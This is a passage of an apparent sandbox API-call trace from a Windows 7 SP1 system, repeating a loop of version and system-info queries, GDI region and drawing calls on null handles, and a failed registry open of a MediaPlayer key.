lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.118] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.118] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.118] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.118] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.118] BeginPath (hdc=0x0) returned 0 [0088.118] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.118] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.118] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.118] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.118] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.118] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.118] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.118] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.119] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfb0401d6 [0088.119] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfd0401d3 [0088.119] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040eca [0088.119] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ecb [0088.119] CombineRgn (hrgnDst=0x1040eca, hrgnSrc1=0xfb0401d6, hrgnSrc2=0xfd0401d3, iMode=1) returned 1 [0088.119] CombineRgn (hrgnDst=0x1040ecb, hrgnSrc1=0xfb0401d6, hrgnSrc2=0xfd0401d3, iMode=4) returned 2 [0088.119] CreateSolidBrush (color=0xff) returned 0x2100ec9 [0088.119] CreateSolidBrush (color=0xff0000) returned 0x1100ecc [0088.119] DeleteObject (ho=0x1100ecc) returned 1 [0088.119] DeleteObject (ho=0xfd0401d3) returned 1 [0088.119] DeleteObject (ho=0xfb0401d6) returned 1 [0088.119] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.119] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.119] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.119] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.119] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.119] BeginPath (hdc=0x0) returned 0 [0088.119] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.119] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.119] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.119] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.119] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.119] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.119] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.119] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.119] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfe0401d3 [0088.119] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfc0401d6 [0088.119] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ecd [0088.120] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ece [0088.120] CombineRgn (hrgnDst=0x1040ecd, hrgnSrc1=0xfe0401d3, hrgnSrc2=0xfc0401d6, iMode=1) returned 1 [0088.120] CombineRgn (hrgnDst=0x1040ece, hrgnSrc1=0xfe0401d3, hrgnSrc2=0xfc0401d6, iMode=4) returned 2 [0088.120] CreateSolidBrush (color=0xff) returned 0x2100ecc [0088.120] CreateSolidBrush (color=0xff0000) returned 0x1100ecf [0088.120] DeleteObject (ho=0x1100ecf) returned 1 [0088.120] DeleteObject (ho=0xfc0401d6) returned 1 [0088.120] DeleteObject (ho=0xfe0401d3) returned 1 [0088.120] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.120] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.120] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.120] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.120] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.120] BeginPath (hdc=0x0) returned 0 [0088.120] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.120] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.120] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.120] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.120] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.120] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.120] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.120] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.120] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfd0401d6 [0088.120] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xff0401d3 [0088.120] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ed0 [0088.120] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ed1 [0088.120] CombineRgn (hrgnDst=0x1040ed0, hrgnSrc1=0xfd0401d6, hrgnSrc2=0xff0401d3, iMode=1) returned 1 [0088.120] CombineRgn (hrgnDst=0x1040ed1, hrgnSrc1=0xfd0401d6, hrgnSrc2=0xff0401d3, iMode=4) returned 2 [0088.120] CreateSolidBrush (color=0xff) returned 0x2100ecf [0088.120] CreateSolidBrush (color=0xff0000) returned 0x1100ed2 [0088.120] DeleteObject (ho=0x1100ed2) returned 1 [0088.120] DeleteObject (ho=0xff0401d3) returned 1 [0088.120] DeleteObject (ho=0xfd0401d6) returned 1 [0088.120] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.121] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.121] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.121] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.121] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.121] BeginPath (hdc=0x0) returned 0 [0088.121] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.121] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.121] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.121] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.121] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.121] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.121] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.121] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.121] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x401d3 [0088.121] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfe0401d6 [0088.121] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ed3 [0088.121] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ed4 [0088.121] CombineRgn (hrgnDst=0x1040ed3, hrgnSrc1=0x401d3, hrgnSrc2=0xfe0401d6, iMode=1) returned 1 [0088.121] CombineRgn (hrgnDst=0x1040ed4, hrgnSrc1=0x401d3, hrgnSrc2=0xfe0401d6, iMode=4) returned 2 [0088.121] CreateSolidBrush (color=0xff) returned 0x2100ed2 [0088.121] CreateSolidBrush (color=0xff0000) returned 0x1100ed5 [0088.121] DeleteObject (ho=0x1100ed5) returned 1 [0088.121] DeleteObject (ho=0xfe0401d6) returned 1 [0088.121] DeleteObject (ho=0x401d3) returned 1 [0088.121] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.121] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.121] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.121] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.121] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.121] BeginPath (hdc=0x0) returned 0 [0088.121] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.121] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.121] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.122] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.122] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.122] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.122] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.122] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.122] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xff0401d6 [0088.122] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x10401d3 [0088.122] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ed6 [0088.122] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ed7 [0088.122] CombineRgn (hrgnDst=0x1040ed6, hrgnSrc1=0xff0401d6, hrgnSrc2=0x10401d3, iMode=1) returned 1 [0088.122] CombineRgn (hrgnDst=0x1040ed7, hrgnSrc1=0xff0401d6, hrgnSrc2=0x10401d3, iMode=4) returned 2 [0088.122] CreateSolidBrush (color=0xff) returned 0x2100ed5 [0088.122] CreateSolidBrush (color=0xff0000) returned 0x1100ed8 [0088.122] DeleteObject (ho=0x1100ed8) returned 1 [0088.122] DeleteObject (ho=0x10401d3) returned 1 [0088.122] DeleteObject (ho=0xff0401d6) returned 1 [0088.122] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.122] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.122] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.122] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.122] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.122] BeginPath (hdc=0x0) returned 0 [0088.122] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.122] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.122] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.122] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.122] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.122] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.122] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.122] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.122] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x20401d3 [0088.122] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x401d6 [0088.122] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ed9 [0088.122] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040eda [0088.123] CombineRgn (hrgnDst=0x1040ed9, hrgnSrc1=0x20401d3, hrgnSrc2=0x401d6, iMode=1) returned 1 [0088.123] CombineRgn (hrgnDst=0x1040eda, hrgnSrc1=0x20401d3, hrgnSrc2=0x401d6, iMode=4) returned 2 [0088.123] CreateSolidBrush (color=0xff) returned 0x2100ed8 [0088.123] CreateSolidBrush (color=0xff0000) returned 0x1100edb [0088.123] DeleteObject (ho=0x1100edb) returned 1 [0088.123] DeleteObject (ho=0x401d6) returned 1 [0088.123] DeleteObject (ho=0x20401d3) returned 1 [0088.123] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.123] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.123] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.123] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.123] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.123] BeginPath (hdc=0x0) returned 0 [0088.123] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.123] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.123] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.123] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.123] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.123] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.123] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.123] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.123] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x10401d6 [0088.123] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x30401d3 [0088.123] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040edc [0088.123] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040edd [0088.123] CombineRgn (hrgnDst=0x1040edc, hrgnSrc1=0x10401d6, hrgnSrc2=0x30401d3, iMode=1) returned 1 [0088.123] CombineRgn (hrgnDst=0x1040edd, hrgnSrc1=0x10401d6, hrgnSrc2=0x30401d3, iMode=4) returned 2 [0088.123] CreateSolidBrush (color=0xff) returned 0x2100edb [0088.123] CreateSolidBrush (color=0xff0000) returned 0x1100ede [0088.123] DeleteObject (ho=0x1100ede) returned 1 [0088.123] DeleteObject (ho=0x30401d3) returned 1 [0088.123] DeleteObject (ho=0x10401d6) returned 1 [0088.123] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.123] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.123] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.123] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.123] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.123] BeginPath (hdc=0x0) returned 0 [0088.123] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.123] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.123] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.123] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.123] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.124] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.124] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.124] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.124] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x40401d3 [0088.124] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x20401d6 [0088.124] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040edf [0088.124] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ee0 [0088.124] CombineRgn (hrgnDst=0x1040edf, hrgnSrc1=0x40401d3, hrgnSrc2=0x20401d6, iMode=1) returned 1 [0088.124] CombineRgn (hrgnDst=0x1040ee0, hrgnSrc1=0x40401d3, hrgnSrc2=0x20401d6, iMode=4) returned 2 [0088.124] CreateSolidBrush (color=0xff) returned 0x2100ede [0088.124] CreateSolidBrush (color=0xff0000) returned 0x1100ee1 [0088.124] DeleteObject (ho=0x1100ee1) returned 1 [0088.124] DeleteObject (ho=0x20401d6) returned 1 [0088.124] DeleteObject (ho=0x40401d3) returned 1 [0088.124] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.124] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.124] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.124] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.124] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.124] BeginPath (hdc=0x0) returned 0 [0088.124] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.124] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.124] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.124] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.124] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.124] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.124] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.124] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.124] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x30401d6 [0088.124] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x50401d3 [0088.124] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ee2 [0088.124] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ee3 [0088.124] CombineRgn (hrgnDst=0x1040ee2, hrgnSrc1=0x30401d6, hrgnSrc2=0x50401d3, iMode=1) returned 1 [0088.124] CombineRgn (hrgnDst=0x1040ee3, hrgnSrc1=0x30401d6, hrgnSrc2=0x50401d3, iMode=4) returned 2 [0088.124] CreateSolidBrush (color=0xff) returned 0x2100ee1 [0088.124] CreateSolidBrush (color=0xff0000) returned 0x1100ee4 [0088.125] DeleteObject (ho=0x1100ee4) returned 1 [0088.125] DeleteObject (ho=0x50401d3) returned 1 [0088.125] DeleteObject (ho=0x30401d6) returned 1 [0088.125] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.125] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.125] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.125] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.125] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.125] BeginPath (hdc=0x0) returned 0 [0088.125] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: 